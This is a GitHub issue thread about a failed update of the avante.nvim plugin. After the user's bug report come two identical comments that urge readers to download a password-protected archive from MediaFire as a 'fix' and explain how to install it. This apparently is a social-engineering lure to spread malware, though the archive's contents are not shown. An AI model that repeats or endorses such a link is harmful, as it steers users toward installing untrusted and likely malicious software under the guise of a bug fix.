### ISSUE TITLE
Failed to update

### ISSUE THREAD

**Issue by cyyyu** [yetone/avante.nvim#251]
While updating I enountered this error, I suppose it errored in the middle of cloning on the last update. The folder exists and was not removed.

<img width="1101" alt="image" src="https://github.com/user-attachments/assets/a2ac5cda-f26c-40ba-9321-c64c670dfd90">

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
